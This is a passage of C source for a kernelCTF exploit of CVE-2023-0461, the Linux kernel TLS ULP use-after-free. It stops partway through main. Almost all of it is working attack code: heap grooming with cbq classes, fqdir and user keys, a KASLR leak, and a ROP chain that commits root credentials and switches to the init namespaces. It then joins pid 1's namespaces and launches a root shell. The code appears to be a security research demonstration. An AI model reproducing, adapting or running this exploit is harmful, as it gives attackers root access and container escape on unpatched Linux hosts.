/*
 *	CVE-2023-0461: Experimental mitigations bypass demonstration.
 *		by D3v17 - savy@syst3mfailure.io
 *
 *	kernelCTF{v1:mitigation-6.1-v2:1689104499:aff0301f86d328c7a295e55cfef9f318f61be153}
 *
 */

#define _GNU_SOURCE

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sched.h>
#include <fcntl.h>
#include <string.h>
#include <keyutils.h>
#include <byteswap.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/xattr.h>
#include <sys/socket.h>
#include <linux/tls.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netinet/tcp.h>
#include <netinet/in.h>

#include "netlink_utils.h"

#define UID_MAP   "/proc/self/uid_map"
#define GID_MAP   "/proc/self/gid_map"
#define SETGROUPS "/proc/self/setgroups"

#define ADD_LINK  RTM_NEWLINK
#define DEL_LINK  RTM_DELLINK
#define FLUSH     RTM_GETLINK
#define ADD_ADDR  RTM_NEWADDR
#define DEL_ADDR  RTM_DELADDR
#define ADD_QDISC RTM_NEWQDISC
#define DEL_QDISC RTM_DELQDISC
#define ADD_CLASS RTM_NEWTCLASS
#define DEL_CLASS RTM_DELTCLASS

#define N_KEYS_1 13
#define N_KEYS_2 39
#define N_NET_INTERFACES 0x1800

/* ---- Globals shared across exploitation stages ---- */
int kid = -1;		// index into keys[] of the key overlapped by the tbf Qdisc
uint64_t kbase = 0;	// kernel base offset derived from the leaked tbf_qdisc_ops pointer
int keys[0x1000];	// serials of the sprayed user keys
int t1[0x100];		// pids of the first fqdir-spray task group
int t2[0x100];		// pids of the second fqdir-spray task group
int tls1, tls2;		// the two TCP sockets that end up sharing one icsk_ulp_data
uint64_t usr_cs, usr_ss, usr_rflags;	// userspace state saved for the iret in the ROP-chain

// States used to coordinate the fqdir spray tasks (see task_spray_fqdir)
enum { TASK_SPRAY_FQDIR = 1, TASK_FREE_FQDIR };
// Control block shared with the spray tasks via MAP_SHARED anonymous memory
struct task_shm { int state, pid; };
struct task_shm *shm;

// Userspace mirror of the kernel's user_key_payload layout
// (next/func overlay the struct rcu_head at the start of the object)
struct user_key_payload {
	void *next, *func;
	unsigned short datalen;
	char *data[];
};

int net_if(int action, char *type, int n, int opt, bool change);

/*
 *	Dump `size` bytes of `buff` as qwords, two per row, with a hex offset
 *	column. Any trailing bytes (size % 8) are ignored.
 *	Fixes: removed the unused variable `j` and the signed/unsigned loop
 *	counter mismatch (`int i` vs `size / 8`).
 */
void hexdump(uint8_t *buff, size_t size)
{
	for (size_t i = 0; i < size / 8; i++) {
		// Start a new row every two qwords
		if ((i % 2) == 0) {
			if (i != 0)
				printf("  \n");

			printf("  %04zx  ", i * 8);
		}
		printf("0x%016lx", ((uint64_t *)buff)[i]);
		printf("    ");
	}

	putchar('\n');
}

/*
 *	Save the userspace cs/ss segment selectors and rflags so the ROP-chain
 *	can build a valid iret frame back to userspace (see build_ropchain()).
 *	x86-64 only: reads cs/ss via `mov` from segment registers and rflags
 *	via pushfq/popq.
 */
void save_state(void)
{
    __asm__ __volatile__(
		".intel_syntax noprefix;"
		"movq %0, cs;"
		"movq %1, ss;"
		"pushfq;"
		"popq %2;"
		".att_syntax;"
		: "=r" (usr_cs), "=r" (usr_ss), "=r" (usr_rflags) : : "memory" );
}

/*
 *	Pin the calling process to CPU `id` so all slab operations hit a
 *	single per-cpu cache (ignores sched_setaffinity() failures, like
 *	the original).
 */
void assign_to_core(int id)
{
	cpu_set_t cpus;

	CPU_ZERO(&cpus);
	CPU_SET(id, &cpus);
	sched_setaffinity(getpid(), sizeof(cpus), &cpus);
}

/*
 *	Sleep for `n` seconds while showing a spinner next to `msg`,
 *	then print a completion line. Used to wait out RCU grace periods.
 */
void waitfor(int n, char *msg)
{
	static const char *frames[] = { "\\", "|", "/", "-" };
	int tick = 0;

	while (tick < n) {
		printf("\r[%s] %s...", frames[tick % 4], msg);
		fflush(stdout);
		sleep(1);
		tick++;
	}

	printf("\r[✓] %s: Done.                     \n", msg);
	fflush(stdout);
}

/*
 *	Write `size` bytes of `data` to `path` (created 0777 if missing).
 *	Returns 0 on success, -1 on open/write failure (errno reported
 *	via perror).
 */
int write_file(char *path, char *data, size_t size)
{
	int rc = -1;
	int fd = open(path, O_WRONLY | O_CREAT, 0777);

	if (fd < 0) {
		perror("[x] write_file()");
		return -1;
	}

	if (write(fd, data, size) >= 0)
		rc = 0;
	else
		perror("[x] write_file()");

	close(fd);
	return rc;
}

/*
 *	Write a one-entry id mapping ("inside outside 1") to a
 *	/proc/self/{uid,gid}_map file. Returns 0 on success, -1 on failure.
 */
int new_map(char *path, int in, int out)
{
	char line[0x40] = { 0 };

	snprintf(line, sizeof(line), "%d %d 1", in, out);

	if (write_file(path, line, strlen(line)) < 0) {
		perror("[x] new_map() - write()");
		return -1;
	}

	return 0;
}

/*
 *	Enter new user/net/mount namespaces so an unprivileged user can
 *	manage network interfaces and traffic-control objects.
 *	Returns 0 on success, -1 if unshare() fails.
 */
int setup_sandbox(void)
{
	int uid, gid;

	uid = getuid();
	gid = getgid();

	if (unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET) < 0) {
		perror("unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET)");
		return -1;
	}

	// Map our real uid/gid to root inside the new user namespace
	write_file(SETGROUPS, "deny", strlen("deny"));
	new_map(UID_MAP, 0, uid);
	new_map(GID_MAP, 0, gid);

	// Scratch file later used by fill_chunk()/setxattr
	write_file("/tmp/x", "x", strlen("x"));
	// Bring up loopback in the new netns (needed for the TLS sockets)
	net_if(ADD_LINK, "lo", -1, IFF_UP, true);

	return 0;
}

/*
 *	Runs in userspace after the ROP-chain returns: the chain already
 *	committed root creds and switched init's namespaces to init_nsproxy,
 *	so joining pid 1's namespaces escapes the container before spawning
 *	an interactive shell.
 */
void getroot(void)
{
	char *args[] = { "/bin/bash", "-i", NULL };

	puts("[+] We are Ro0ot!");
	// The open() fds are intentionally leaked: we execve right after
	setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
	setns(open("/proc/1/ns/pid", O_RDONLY), 0);
	setns(open("/proc/1/ns/net", O_RDONLY), 0);
	execve(args[0], args, NULL);
}

/*
 *	Allocate a tls_context structure.
 */
/*
 *	Create a loopback TCP connection on `port` and attach the TLS ULP to
 *	the connected socket: setsockopt(TCP_ULP, "tls") allocates the
 *	tls_context (icsk_ulp_data).
 *
 *	Returns the TLS-enabled socket fd, or -1 if socket creation fails.
 *	The listener and the accepted peer fds are deliberately kept open so
 *	the connection stays ESTABLISHED.
 *
 *	Fixes: missing (struct sockaddr *) casts, uninitialized sockaddr_in
 *	padding, unchecked socket() returns.
 */
int tls_ctx_alloc(int port)
{
	struct sockaddr_in addr = { 0 };
	socklen_t len = sizeof(addr);
	int tls, s;

	tls = socket(AF_INET, SOCK_STREAM, 0);
	s = socket(AF_INET, SOCK_STREAM, 0);

	if (tls < 0 || s < 0) {
		perror("[x] tls_ctx_alloc() - socket()");
		return -1;
	}

	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = INADDR_ANY;
	addr.sin_port = htons(port);

	// Put the socket into ESTABLISHED state
	bind(s, (struct sockaddr *)&addr, sizeof(addr));
	listen(s, 0);
	connect(tls, (struct sockaddr *)&addr, sizeof(addr));
	accept(s, (struct sockaddr *)&addr, &len);

	// Initialize TLS ULP
	setsockopt(tls, SOL_TCP, TCP_ULP, "tls", sizeof("tls"));

	return tls;
}

/*
 *	Create a new socket that shares the same
 *	icsk_ulp_data pointer with the input socket `sk`.
 */
int clone_ulp(int sk, int port)
{
	struct sockaddr_in addr;
	socklen_t len = sizeof(addr);
	int s, new;

	s = socket(AF_INET, SOCK_STREAM, 0);

	// Disconnect the input socket `sk`:
	// connect(AF_UNSPEC) resets the TCP connection but leaves
	// icsk_ulp_data (the tls_context) attached -- the CVE-2023-0461 flaw
	addr.sin_family = AF_UNSPEC;
	addr.sin_addr.s_addr = INADDR_ANY;
	addr.sin_port = htons(port);
	connect(sk, &addr, sizeof(addr));

	// Listen on `sk` (This should not happen!)
	addr.sin_family = AF_INET;
	bind(sk, &addr, sizeof(addr));
	listen(sk, 0);
	connect(s, &addr, sizeof(addr));

	// Clone icsk_ulp_data: the child socket inherits the parent's pointer
	new = accept(sk, &addr, &len);

	// Now the input socket `sk` and `new`
	// share the same icsk_ulp_data pointer
	return new;
}

/*
 *	Add / Change / Delete a network interface.
 *	Equivalent to `ip link add/change/delete ...`.
 */
/*
 *	`action`: ADD_LINK / DEL_LINK / ADD_ADDR / DEL_ADDR
 *	`type`:   interface kind ("dummy", "lo", ...); also the base name
 *	`n`:      instance number; n >= 0 names the interface "<type>-<n>"
 *	`opt`:    interface flags (links, e.g. IFF_UP) or address base (addrs)
 *	`change`: whether to set ifi_change (apply the flags on existing links)
 */
int net_if(int action, char *type, int n, int opt, bool change) {

	struct nlmsghdr *msg;
	struct nlattr *opts;
	struct ifinfomsg ifinfo = {};
	struct ifaddrmsg ifaddr = {};
	char name[0x100] = { 0 };
	int sk;

	strcpy(name, type);

	if (n >= 0)
		snprintf(name, sizeof(name), "%s-%d", type, n);

	// Initalize a netlink socket and allocate a nlmsghdr
	sk = nl_init_request(action, &msg, NLM_F_REQUEST|NLM_F_CREATE);
	if (!sk) {
		perror("nl_init_request()");
		return -1;
	}

	switch (action) {
		case ADD_LINK:
		case DEL_LINK:

			ifinfo.ifi_family = AF_UNSPEC;
			ifinfo.ifi_type = PF_NETROM;
			ifinfo.ifi_index = (action == DEL_LINK) ? if_nametoindex(name) : 0;
			ifinfo.ifi_flags = opt;
			ifinfo.ifi_change = change ? 1 : 0;

			nlmsg_append(msg, &ifinfo, sizeof(ifinfo), NLMSG_ALIGNTO);

			if (action == ADD_LINK) {
				// Setting the MTU below IPV6_MIN_MTU, ipv6 is disabled
				// (https://elixir.bootlin.com/linux/v6.1/source/net/ipv6/addrconf.c#L3537)
				// This way we can get rid of an annoying timer that periodically calls qdisc->enqueue()
				nla_put_u32(msg, IFLA_MTU, 1000);
				nla_put_string(msg, IFLA_IFNAME, name);
				opts = nla_nest_start(msg, IFLA_LINKINFO);
				nla_put_string(msg, IFLA_INFO_KIND, type);
				nla_nest_end(msg, opts);
			}

			break;

		case ADD_ADDR:
		case DEL_ADDR:

			ifaddr.ifa_family = AF_INET;
			ifaddr.ifa_prefixlen = 16;
			ifaddr.ifa_flags = 0;
			ifaddr.ifa_scope = RT_SCOPE_UNIVERSE;
			ifaddr.ifa_index = if_nametoindex(name);

			nlmsg_append(msg, &ifaddr, sizeof(ifaddr), NLMSG_ALIGNTO);
			// Address is derived from opt+n (byteswapped into network order)
			nla_put_u32(msg, IFA_LOCAL, __bswap_32(opt + n));
			nla_put_u32(msg, IFA_ADDRESS, __bswap_32(opt + n));

			break;
	}
	// Send the netlink message and deallocate resources
	return nl_complete_request(sk, msg);
}

/*
 *	Add / Delete a queue discipline.
 *	Equivalent to `tc qdisc add/delete ...`.
 *	Qdisc parameters are not relevant to exploitation unless explicitly highlighted.
 */
/*
 *	`action`: ADD_QDISC / DEL_QDISC, on interface "<if_name>-<n>".
 *	`qdisc`:  "tbf" (allocated in dyn-kmalloc-1k) or "cbq" (class parent).
 */
int tc_qdisc(int action, char *if_name, int n, char *qdisc)
{
	struct nlmsghdr *msg, *options;
	struct tcmsg tchdr;
	char name[0x100] = { 0 };
	int sk;

	snprintf(name, sizeof(name), "%s-%d", if_name, n);

	sk = nl_init_request(action, &msg, NLM_F_REQUEST|NLM_F_CREATE);
	if (!sk) {
		perror("nl_init_request()");
		return -1;
	}

	tchdr.tcm_family  = AF_UNSPEC;
	tchdr.tcm_ifindex = if_nametoindex(name);
	tchdr.tcm_handle  = 0x10000;	// qdisc handle 1:0
	tchdr.tcm_parent  = -1;		// 0xffffffff == TC_H_ROOT
	tchdr.tcm_info    = 0;

	nlmsg_append(msg, &tchdr, sizeof(struct tcmsg), NLMSG_ALIGNTO);
	nla_put_string(msg, TCA_KIND, qdisc);

	if (action == ADD_QDISC) {
		// Allocate a tbf Qdisc in dyn-kmalloc-1k
		if (!strcmp(qdisc, "tbf")) {
			struct tc_tbf_qopt qopt = {};
			options = nlmsg_alloc();
			nla_put(options, TCA_TBF_PARMS, sizeof(qopt), &qopt);
			nla_put_u32(options, TCA_TBF_BURST, 1514); // Random burst value, not important
			nla_put_nested(msg, TCA_OPTIONS, options);
			nlmsg_free(options);
		}
		// Setup cbq Qdisc, used to allocate cbq_class objects later
		else if (!strcmp(qdisc, "cbq")) {
			struct tc_ratespec r = {};
			struct tc_cbq_lssopt lss = {};
			uint32_t rtab[256];	// NOTE(review): sent uninitialized; contents appear irrelevant here -- confirm

			r.rate = 1;
			r.mpu  = 1;
			r.cell_log = 1;
			r.overhead = 1;
			lss.change = TCF_CBQ_LSS_MAXIDLE|TCF_CBQ_LSS_EWMA|TCF_CBQ_LSS_AVPKT;
			lss.avpkt  = 1;

			options = nlmsg_alloc();
			nla_put(options, TCA_CBQ_RATE, sizeof(r), &r);
			nla_put(options, TCA_CBQ_LSSOPT, sizeof(lss),  &lss);
			nla_put(options, TCA_CBQ_RTAB, sizeof(rtab), rtab);
			nla_put_nested(msg, TCA_OPTIONS, options);
			nlmsg_free(options);
		}
	}
	return nl_complete_request(sk, msg);
}

/*
 *	Add / Delete a traffic class.
 *	Equivalent to `tc class add/delete ...`.
 *	Class parameters are not relevant to exploitation unless explicitly highlighted.
 */
/*
 *	`action`:  ADD_CLASS / DEL_CLASS, on interface "<if_name>-<n>".
 *	`classid`: minor number of the class handle (major is fixed at 1).
 */
int tc_class(int action, char *if_name, int n, char *class, int classid)
{
	struct nlmsghdr *msg, *options;
	struct tcmsg tchdr;
	char name[0x100] = { 0 };
	int sk;

	snprintf(name, sizeof(name), "%s-%d", if_name, n);

	sk = nl_init_request(action, &msg, NLM_F_REQUEST|NLM_F_CREATE);
	if (!sk) {
		perror("nl_init_request()");
		return -1;
	}

	tchdr.tcm_family  = AF_UNSPEC;
	tchdr.tcm_ifindex = if_nametoindex(name);
	tchdr.tcm_handle  = (1 << 16) | classid;	// handle 1:<classid>
	tchdr.tcm_parent  = 0;
	tchdr.tcm_info    = 0;

	nlmsg_append(msg, &tchdr, sizeof(struct tcmsg), NLMSG_ALIGNTO);
	nla_put_string(msg, TCA_KIND, class);

	if (action == ADD_CLASS) {
		// Allocate cbq_class in kmalloc-512
		// This will also allocate a pfifo Qdisc in the same cache
		if (!strcmp(class, "cbq")) {
			struct tc_ratespec r = {};
			struct tc_cbq_lssopt lss = {};
			struct tc_cbq_wrropt wrr = {};
			uint32_t rtab[256];	// NOTE(review): sent uninitialized; contents appear irrelevant here -- confirm

			r.rate = 1;
			r.mpu = 1;
			r.cell_log = 1;
			r.overhead = 1;

			lss.change = TCF_CBQ_LSS_MAXIDLE|TCF_CBQ_LSS_EWMA|TCF_CBQ_LSS_AVPKT;
			lss.avpkt = 1;

			options = nlmsg_alloc();
			nla_put(options, TCA_CBQ_RATE, sizeof(r), &r);
			nla_put(options, TCA_CBQ_LSSOPT, sizeof(lss),  &lss);
			// wrropt check in the kernel is bugged (?!)
			nla_put(options, TCA_CBQ_WRROPT, sizeof(wrr),  &wrr);
			nla_put(options, TCA_CBQ_RTAB, sizeof(rtab), rtab);
			nla_put_nested(msg, TCA_OPTIONS, options);
			nlmsg_free(options);
		}
		// ...
	}
	return nl_complete_request(sk, msg);
}

/*
 *	Create a new task that will execute `func`.
 */
int start_task(int (*func)(void *))
{
	// clone() needs a caller-supplied stack: allocate 0x8000 bytes and
	// pass its top (the stack grows down on x86-64). The region is
	// intentionally never freed: it must outlive the child.
	// Fixes: unchecked malloc() and arithmetic on void* (GNU extension).
	char *stack = malloc(0x8000);

	if (!stack)
		return -1;

	return clone(func, stack + 0x8000,
			CLONE_CHILD_SETTID|CLONE_CHILD_CLEARTID|SIGCHLD, NULL);
}

/*
 *	Used to synchronize tasks.
 *	The task waits for a specific state on another core.
 */
/*
 *	Park on core 1 and spin until the coordinator publishes the expected
 *	(pid, state) pair in shared memory, then move back to core 0 where
 *	the groomed slabs live.
 */
void task_wait_state(int pid, int state)
{
	assign_to_core(1);

	for (;;) {
		if (shm->pid == pid && shm->state == state)
			break;
		usleep(100);
	}

	assign_to_core(0);
}

/*
 *	Used to synchronize tasks.
 *	Set a state for the specified task.
 *
 *	Possible states:
 *		- TASK_SPRAY_FQDIR: The task allocates fqdir structures via unshare(CLONE_NEWNET)
 *		- TASK_FREE_FQDIR:  The task exists and fqdir structures are released
 */
void task_set_state(int pid, int state)
{
	// Publish the (pid, state) pair the spray tasks poll for, then give
	// the woken task time to run before the caller proceeds
	shm->pid = pid;
	shm->state = state;
	usleep(20000);
}

/*
 *	Alloc / Free fqdir structures based on task state.
 */
int task_spray_fqdir(void *_)
{
	pid_t pid = getpid();

	// Block until the coordinator flags this pid for spraying
	task_wait_state(pid, TASK_SPRAY_FQDIR);
	// unshare(CLONE_NEWNET) will allocate 4 structures in kmalloc-512 followed by 3 fqdir
	// we need to keep this in mind for later
	unshare(CLONE_NEWNET);
	// Block again until the coordinator wants the fqdir objects released
	task_wait_state(pid, TASK_FREE_FQDIR);
	// When the task exits, the fqdir objects associated to the netns are released
	return 0;
}

/*
 *	Allocate a user_key_payload structure.
 */
int key_alloc(int i, char *buff, size_t size)
{
	char desc[256] = { 0 };
	key_serial_t key;
	char *payload;

	sprintf(desc, "payload_%d", i);

	size -= sizeof(struct user_key_payload);
	payload = buff ? buff : calloc(1, size);

	if (!buff)
		*(uint64_t *)&payload[0] = i; // Tag the key

	keys[i] = add_key("user", desc, payload, size, KEY_SPEC_PROCESS_KEYRING);

	if (keys[i] < 0) {
		perror("[x] key_alloc()");
		return -1;
	}

	return 0;
}

/*
 *	Get user_key_payload data.
 */
/*
 *	Read up to `size` bytes of the payload of keys[i] into a freshly
 *	allocated buffer. The caller owns (and must free) the returned
 *	buffer; returns NULL on failure.
 *	Fixes: buffer was leaked on the keyctl_read() error path and the
 *	calloc() result was unchecked.
 */
char *key_get(int i, size_t size)
{
	char *data = calloc(1, size);

	if (!data)
		return NULL;

	if (keyctl_read(keys[i], data, size) < 0) {
		perror("[x] key_get()");
		free(data);
		return NULL;
	}

	return data;
}

/*
 *	Free user_key_payload.
 */
/*
 *	Revoke and unlink keys[i] from the process keyring, releasing the
 *	kernel user_key_payload. Returns 0 on success, -1 on failure.
 */
int key_free(int i)
{
	int serial = keys[i];

	if (keyctl_revoke(serial) < 0) {
		perror("[x] keyctl_revoke()");
		return -1;
	}

	if (keyctl_unlink(serial, KEY_SPEC_PROCESS_KEYRING) < 0) {
		perror("[x] keyctl_unlink()");
		return -1;
	}

	return 0;
}

/*
 *	Use setxattr to initialize the chunk. (Please note that this does _not_ allocate a simple_xattr structure!)
 *	setxattr() can be useful to zero out the chunk before a subsequent allocation in the same location
 *	or to control uninitialized fields (e.g. the first two qwords of a user key).
 *
 *	Allocated/filled with user data here: https://elixir.bootlin.com/linux/v6.1/source/fs/xattr.c#L573
 *	Automatically freed here: https://elixir.bootlin.com/linux/v6.1/source/fs/xattr.c#L619
 */
void fill_chunk(char *data, size_t size)
{
	// If the caller passes no data, use a zeroed scratch buffer
	// Fixes: the scratch buffer was leaked on every call
	char *buff = data ? data : calloc(1, size);

	if (!buff)
		return;

	setxattr("/tmp/x", "user.x", buff, size, XATTR_CREATE);

	if (!data)
		free(buff);	// only free the buffer we allocated ourselves
}

/*
 *	Bypass KASLR leaking the tbf_qdisc_ops function pointer from a tbf Qdisc object.
 */
/*
 *	Scan every sprayed key: the keys were allocated with zeroed payloads,
 *	so a nonzero first qword means a tbf Qdisc overlapped that key and we
 *	are reading its qdisc_ops pointer. Sets `kid` and `kbase` on success.
 *	Returns 0 on success, -1 if no corrupted key is found.
 */
int bypass_kaslr(void)
{
	uint64_t *leak;

	for (int i = 0; i < N_KEYS_1; i++) {
		leak = (uint64_t *)key_get(i, PAGE_SIZE);
		if (!leak)
			continue;

		if (*leak) {
			kid = i;
			kbase = *leak - 0xffffffff83934b20; // tbf_qdisc_ops (address hardcoded for the target build)
			puts("[+] Cache transfer completed!");
			printf("[+] Key found: keys[%d]\n", kid);
			printf("[+] Leaked tbf_qdisc_ops: 0x%llx\n", *leak);
			printf("[+] Kernel base: 0x%llx\n", kbase + 0xffffffff00000000);
			return 0;
		}
	}

	return -1;
}

/*
 *	Debug helper: print a message and block until a key is pressed.
 */
void bp(char *msg)
{
	fprintf(stdout, "[-] Paused - %s\n", msg);
	(void)getchar();
}

/*
 *	Hijack control flow sending packets to the interfaces.
 *	This will trigger qdisc->enqueue() aka will execute the stack pivot gadget.
 */
void abracadabra(void)
{
	struct sockaddr_pkt addr = {};
	struct msghdr msg = {};
	struct iovec msgvec = {};
	int s;

	puts("[*] Hijacking control flow...");
	// SOCK_PACKET lets us hand a frame directly to an interface by name
	s = socket(AF_PACKET, SOCK_PACKET, htons(ETH_P_ALL));

	// Dummy payload; its content is irrelevant
	msgvec.iov_base = "XXXXXXXXXXXXXXXXXXXXXXXX";
	msgvec.iov_len = strlen("XXXXXXXXXXXXXXXXXXXXXXXX");

	addr.spkt_family = AF_PACKET;
	msg.msg_iov = &msgvec;
	msg.msg_iovlen = 1;
	msg.msg_name = &addr;
	msg.msg_namelen = sizeof(addr);

	// Send one packet per sprayed interface: the one whose Qdisc was
	// corrupted will call the overwritten enqueue() pointer
	for (int i = 0; i < N_NET_INTERFACES; i++) {
		snprintf(addr.spkt_device, sizeof(addr.spkt_device), "%s-%d", "dummy", i);
		sendmsg(s, &msg, 0);
	}
}

/*
 *	ROP-Chain to gain root privileges and escape from the container plus two new bypasses.
 *	Bypass "Illegal context switch in RCU read-side critical section" setting current->rcu_read_lock_nesting = 0.
 *	Bypass "schedule while atomic" setting oops_in_progress = 1.
 */
/*
 *	Build the fake Qdisc object in `data`. Offsets 0x00/0x08/0x2e hold the
 *	stack-pivot gadgets that run when enqueue() is called on the corrupted
 *	Qdisc; the chain proper starts at offset 0x88. All gadget/symbol
 *	addresses are hardcoded for the target kernelCTF build (see the flag
 *	in the file header) and rebased with `kbase`.
 */
void build_ropchain(char *data)
{
	int idx = 0;
	uint64_t *rop;
	char *stack;

	// Userspace stack for after the iret, at a fixed address so the chain
	// can reference it without further leaks
	stack = mmap((void *)0xdead000, 0x100000, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
	memset(stack, 0, 0x100000);

	*(uint64_t *)&data[0x00] = kbase + 0xffffffff81be41e4; // push rsi ; jmp qword ptr [rsi + 0x2e]
	*(uint64_t *)&data[0x08] = kbase + 0xffffffff8149d2d5; // add rsp, 0x78 ; jmp 0xffffffff82404440 (retpoline)
	*(uint64_t *)&data[0x2e] = kbase + 0xffffffff81081e5e; // pop rsp ; pop r15 ; ret

	rop = (uint64_t *)&data[0x88];

	// oops_in_progress = 1 (Bypass schedule while atomic)
	rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
	rop[idx++] = 1;                          // 1
	rop[idx++] = kbase + 0xffffffff810fb7dd; // pop rsi ; ret
	rop[idx++] = kbase + 0xffffffff8419f478; // oops_in_progress
	rop[idx++] = kbase + 0xffffffff81246359; // mov qword ptr [rsi], rdi ; jmp 0xffffffff82404440 (retpoline)

	// creds = prepare_kernel_cred(0)
	rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
	rop[idx++] = 0;                          // 0
	rop[idx++] = kbase + 0xffffffff811139d0; // prepare_kernel_cred

	// commit_creds(creds)
	rop[idx++] = kbase + 0xffffffff811e3633; // pop rcx ; ret
	rop[idx++] = 0;                          // 0 (rcx = 0 so the rep prefix below is a no-op)
	rop[idx++] = kbase + 0xffffffff8204933b; // mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; jmp 0xffffffff82404440 (retpoline)
	rop[idx++] = kbase + 0xffffffff811136f0; // commit_creds

	// current = find_task_by_vpid(getpid())
	rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
	rop[idx++] = getpid();                   // pid
	rop[idx++] = kbase + 0xffffffff8110a0d0; // find_task_by_vpid

	// current += offsetof(struct task_struct, rcu_read_lock_nesting)
	rop[idx++] = kbase + 0xffffffff810fb7dd; // pop rsi ; ret
	rop[idx++] = 0x46c;                      // offsetof(struct task_struct, rcu_read_lock_nesting)
	rop[idx++] = kbase + 0xffffffff8107befa; // add rax, rsi ; jmp 0xffffffff82404440 (retpoline)

	// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
	rop[idx++] = kbase + 0xffffffff811e3633; // pop rcx ; ret
	rop[idx++] = 0;                          // 0
	rop[idx++] = kbase + 0xffffffff8167104b; // mov qword ptr [rax], rcx ; jmp 0xffffffff82404440 (retpoline)

	// task = find_task_by_vpid(1)
	rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
	rop[idx++] = 1;                          // pid
	rop[idx++] = kbase + 0xffffffff8110a0d0; // find_task_by_vpid

	// switch_task_namespaces(task, init_nsproxy)
	rop[idx++] = kbase + 0xffffffff811e3633; // pop rcx ; ret
	rop[idx++] = 0;                          // 0
	rop[idx++] = kbase + 0xffffffff8204933b; // mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; jmp 0xffffffff82404440 (retpoline)
	rop[idx++] = kbase + 0xffffffff810fb7dd; // pop rsi ; ret
	rop[idx++] = kbase + 0xffffffff83661680; // init_nsproxy (from parse_mount_options)
	rop[idx++] = kbase + 0xffffffff81111c80; // switch_task_namespaces

	// Back to userspace: fake iret frame consumed by the trampoline below
	rop[idx++] = kbase + 0xffffffff822010c6; // swapgs_restore_regs_and_return_to_usermode + 54
	rop[idx++] = 0;
	rop[idx++] = 0;
	rop[idx++] = (uint64_t)&getroot;         // rip
	rop[idx++] = usr_cs;
	rop[idx++] = usr_rflags;
	rop[idx++] = (uint64_t)(stack + 0x80000); // rsp (middle of the mmap'd stack)
	rop[idx++] = usr_ss;
}

/*
 *	Stage 0: sandbox setup and heap grooming. The ordering of the sprays
 *	below is deliberate -- do not reorder.
 */
void init_exploit(void)
{
	puts("[*] Initializing...");

	// Shared memory used to coordinate tasks
	shm = (struct task_shm *)mmap(NULL, sizeof(struct task_shm),
		PROT_READ| PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);

	// Operate on core 0 slabs
	assign_to_core(0);

	// Unshare user/net ns to setup network interfaces
	// and allocate qdisc and traffic classes
	setup_sandbox();

	// Initialize tasks to spray fqdir structures later
	#define N_SPRAY_1 2
	for (int i = 0; i < N_SPRAY_1; i++)
		t1[i] = start_task(task_spray_fqdir);

	#define N_SPRAY_2 1
	for (int i = 0; i < N_SPRAY_2; i++)
		t2[i] = start_task(task_spray_fqdir);

	// Setup network interfaces to spray tbf Qdisc later
	for (int i = 0; i < N_NET_INTERFACES; i++)
		net_if(ADD_LINK, "dummy", i, 0, false);

	// Setup a network interface and set its queue discipline to cbq
	// It will be used for heap grooming via cbq_class + pfifo Qdisc objects
	net_if(ADD_LINK, "dummy", 696, 0, false);
	tc_qdisc(ADD_QDISC, "dummy", 696, "cbq");

	// Fill partials in kmalloc-512 with cbq_class + pfifo Qdisc objects
	// both allocated by cbq_change_class() when a new cbq traffic class is created
	for (int i = 0x300; i < 0x2000; i++)
		tc_class(ADD_CLASS, "dummy", 696, "cbq", i);

	// Keep saturating kmalloc-512 with cbq_class + pfifo Qdisc objects
	for (int i = 0; i < 0x300; i++)
		tc_class(ADD_CLASS, "dummy", 696, "cbq", i);

	// Create some holes in the slab. tls_context will be allocated here.
	// This will free 2 chunks in kmalloc-512:
	// 1 cqb_class immediately, 1 pfifo Qdisc after a RCU grace period
	tc_class(DEL_CLASS, "dummy", 696, "cbq", 0x2fd);

	// Alloc tls context
	tls1 = tls_ctx_alloc(1111);
}

/*
 *	Exploit driver: stage 1 transfers the UAF from kmalloc-512 to
 *	dyn-kmalloc-1k, stage 2 leaks KASLR, stage 3 hijacks qdisc->enqueue().
 *	The sleeps between steps wait out RCU grace periods; do not shorten.
 */
int main(void)
{
	// Backing buffer for sprayed key payloads and later the fake Qdisc
	char data[0x1000] = { 0 };

	save_state();
	init_exploit();

	// Trigger the vulnerability:
	// clone ULP so that two sockets share the same icsk_ulp_data pointer
	tls2 = clone_ulp(tls1, 1112);

	// [STAGE 1] Cache transfer
	// Transfer exploitation primitives from kmalloc-512 to dyn-kmalloc-1k

	// Step 1.0 - Close the first socket
	// icsk_ulp_data (tls_context) is freed but still accessible from the second socket
	close(tls1);

	// Wait for the RCU grace period:
	// usually sleep(1) is enough, but for tls_context sometimes it takes longer ¯\_(ツ)_/¯
	waitfor(6, "Freeing ctx");

	// Step 1.1 - Close the second socket and before the icsk_ulp_data pointer (tls_context)
	// is freed again (during the RCU grace period) replace it with a fqdir object
	close(tls2);
	for (int i = 0; i < N_SPRAY_1; i++)
		task_set_state(t1[i], TASK_SPRAY_FQDIR);

	// Wait for the RCU grace period. Again, longer than usual
	// The fqdir object will be freed instead of tls_context
	waitfor(6, "Spraying F1");

	// Step 1.2 - Overlap another fqdir to the freed one
	// After the spray the bucket_table pointers of both objects will point to the same table
	for (int i = 0; i < N_SPRAY_2; i++)
		task_set_state(t2[i], TASK_SPRAY_FQDIR);
	waitfor(1, "Spraying F2"); // Wait for tasks

	// Step 1.3 - Free one of the overlapped fqdir objects
	// This will also free the shared bucket_table in dyn-kmalloc-1k
